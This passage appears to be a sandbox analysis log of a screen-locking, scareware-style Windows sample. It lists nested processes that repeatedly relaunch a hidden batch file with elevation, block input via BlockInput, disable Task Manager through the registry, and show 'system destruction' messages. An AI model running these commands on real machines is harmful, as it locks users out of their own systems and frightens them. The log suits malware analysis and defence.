        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        80⤵
        
        PID:3216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        81⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8116
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        82⤵
        
        PID:7480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        83⤵
        
        PID:8056
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        84⤵
        
        PID:5000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        85⤵
        
        PID:6552
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        86⤵
        
        PID:8456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        87⤵
        
        PID:8888
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        88⤵
        
        PID:8348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        89⤵
        
        PID:7008
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        90⤵
        
        PID:2836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        91⤵
        
        PID:6788
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        92⤵
        
        PID:8876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        93⤵
        
        PID:8324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        93⤵
        
        PID:8912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        93⤵
        
        PID:7392
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0js4xstc\0js4xstc.cmdline"
        94⤵
        
        PID:6224
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7AD8.tmp" "c:\Users\Admin\AppData\Local\Temp\0js4xstc\CSC73D76F4ABD8740DB9A5AB62CF531F89.TMP"
        95⤵
        
        PID:3788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        93⤵
        
        PID:8808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        93⤵
        
        PID:6276
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r3zlk1ll\r3zlk1ll.cmdline"
        94⤵
        
        PID:6788
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8085.tmp" "c:\Users\Admin\AppData\Local\Temp\r3zlk1ll\CSCC163F009F21C40A5BD9C5FB316723D50.TMP"
        95⤵
        
        PID:8632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        93⤵
        
        PID:9064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        93⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        91⤵
        
        PID:5336
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rt352gv2\rt352gv2.cmdline"
        92⤵
        
        PID:6608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        89⤵
        
        PID:8852
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zv5vs4w2\zv5vs4w2.cmdline"
        90⤵
        
        PID:6656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        87⤵
        
        PID:8968
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\scmhthfo\scmhthfo.cmdline"
        88⤵
        
        PID:6552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        85⤵
        
        PID:8736
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dclbifyu\dclbifyu.cmdline"
        86⤵
        
        PID:6940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        83⤵
        
        PID:6720
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xm4k55tb\xm4k55tb.cmdline"
        84⤵
        
        PID:1184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        81⤵
        
        PID:7880
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1bwwnewg\1bwwnewg.cmdline"
        82⤵
        
        PID:6156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        81⤵
        
        PID:3284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        79⤵
        
        PID:6532
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v1nz4mw\5v1nz4mw.cmdline"
        80⤵
        
        PID:7896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        77⤵
        
        PID:7992
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\slfbylys\slfbylys.cmdline"
        78⤵
        
        PID:7164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        77⤵
        
        PID:8096
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kdhqqkc5\kdhqqkc5.cmdline"
        78⤵
        
        PID:6908
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES873C.tmp" "c:\Users\Admin\AppData\Local\Temp\kdhqqkc5\CSC28E580D6A20949938ED5E96FDC9547.TMP"
        79⤵
        
        PID:6168
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        77⤵
        
        PID:9120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        77⤵
        
        PID:8632
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5f01wkoa\5f01wkoa.cmdline"
        78⤵
        
        PID:9212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        75⤵
        
        PID:5500
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3fqbsye5\3fqbsye5.cmdline"
        76⤵
        
        PID:7840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        75⤵
        
        PID:6428
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5jd55psv\5jd55psv.cmdline"
        76⤵
        
        PID:8916
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DF5.tmp" "c:\Users\Admin\AppData\Local\Temp\5jd55psv\CSC6E7F8269BA054C36A42060327C927CF5.TMP"
        77⤵
        
        PID:7336
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        75⤵
        
        PID:6864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        75⤵
        
        PID:9068
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2y2pamji\2y2pamji.cmdline"
        76⤵
        
        PID:3284
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87D8.tmp" "c:\Users\Admin\AppData\Local\Temp\2y2pamji\CSC47D129978F2A49399D29868F525E81E3.TMP"
        77⤵
        
        PID:8164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        75⤵
        
        PID:8168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        75⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        73⤵
        
        PID:7624
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l55bkckh\l55bkckh.cmdline"
        74⤵
        
        PID:7544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        73⤵
        
        PID:9052
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uenktrvu\uenktrvu.cmdline"
        74⤵
        
        PID:9080
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7903.tmp" "c:\Users\Admin\AppData\Local\Temp\uenktrvu\CSCD000D66DFAE2448B934AFED652A82CE.TMP"
        75⤵
        
        PID:8516
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        73⤵
        
        PID:6168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        73⤵
        
        PID:8344
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qkpyurjc\qkpyurjc.cmdline"
        74⤵
        
        PID:1224
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81CD.tmp" "c:\Users\Admin\AppData\Local\Temp\qkpyurjc\CSCC795E210FC3242D9A16E9E5882E16447.TMP"
        75⤵
        
        PID:3748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        73⤵
        
        PID:8920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        73⤵
        
        PID:4392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        71⤵
        
        PID:7720
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\toa0ah00\toa0ah00.cmdline"
        72⤵
        
        PID:6760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        71⤵
        
        PID:7428
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        71⤵
        
        PID:9068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        69⤵
        
        PID:7672
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xhbk3yr3\xhbk3yr3.cmdline"
        70⤵
        
        PID:3540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        69⤵
        
        PID:8700
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5d2x2ic0\5d2x2ic0.cmdline"
        70⤵
        
        PID:5296
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74AE.tmp" "c:\Users\Admin\AppData\Local\Temp\5d2x2ic0\CSC2728E4F6E5A244B8BAD051DD5291E199.TMP"
        71⤵
        
        PID:5356
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        69⤵
        
        PID:5360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        69⤵
        
        PID:5376
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uytloqe4\uytloqe4.cmdline"
        70⤵
        
        PID:8696
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B26.tmp" "c:\Users\Admin\AppData\Local\Temp\uytloqe4\CSC12A9BEA31F58451EB566E1E3A42321F.TMP"
        71⤵
        
        PID:7792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        69⤵
        
        PID:6560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        67⤵
        
        PID:5048
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ryezcckw\ryezcckw.cmdline"
        68⤵
        
        PID:5664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        67⤵
        
        PID:8764
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o2fvoeyd\o2fvoeyd.cmdline"
        68⤵
        
        PID:5564
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES62CC.tmp" "c:\Users\Admin\AppData\Local\Temp\o2fvoeyd\CSC60037AA2BFC54875B5E1A5DFC0C9D975.TMP"
        69⤵
        
        PID:5640
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        67⤵
        
        PID:8404
        
